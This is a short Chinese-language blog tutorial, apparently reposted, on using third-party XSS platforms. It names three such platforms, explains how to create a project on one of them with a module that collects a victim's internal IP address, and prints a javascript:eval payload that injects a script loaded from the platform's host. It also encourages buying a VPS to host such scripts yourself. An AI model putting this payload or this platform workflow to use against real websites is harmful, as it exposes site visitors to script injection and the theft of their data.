我接触使用过三个XSS平台
1.脚本非常丰富:http://www.1oad.com
2.简约:https://xsspt.com
3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn
所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明;
一、注册用户并登录
二、创建项目
1.创建项目,创建完后会生成一个xss可用脚本地址
项目名称随意,项目描述随意;但是创建之后就不能更改了。
2.有很多可用的模块,我们这次要构建一个获取计算机内网ip地址的xss脚本,所以勾选获取内网ip模块;
这里也选择上
点击下一步就创建成功一个项目,如下:
上图中“xsshs.cn/JI9q” 就是本次构建攻击脚本,其中 JI9q就是id;
三、如何使用
(本次测试方法为自己本地测试—-就是自己攻击自己,假设已经成功xss,然后查看xss的效果)
打开任意网站例如百度,如后输入
javascript:eval('window.s=document.createElement("script");window.s.src="//xsshs.cn/JI9q";document.body.appendChild(window.s)')
注意:其中src换成你自己的攻击脚本即可,然后回车
此时返回xss平台:
以上XSS平台 测试演示成功;
一定要多多利用平台上面各种脚本,那个才是根本,然后自己买一个VPS,不用这个平台也是可以的。
今天的文章web安全:XSS测试平台使用教程分享到此就结束了,感谢您的阅读,如果确实帮到您,您可以动动手指转发给其他人。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:http://bianchenghao.cn/27868.html
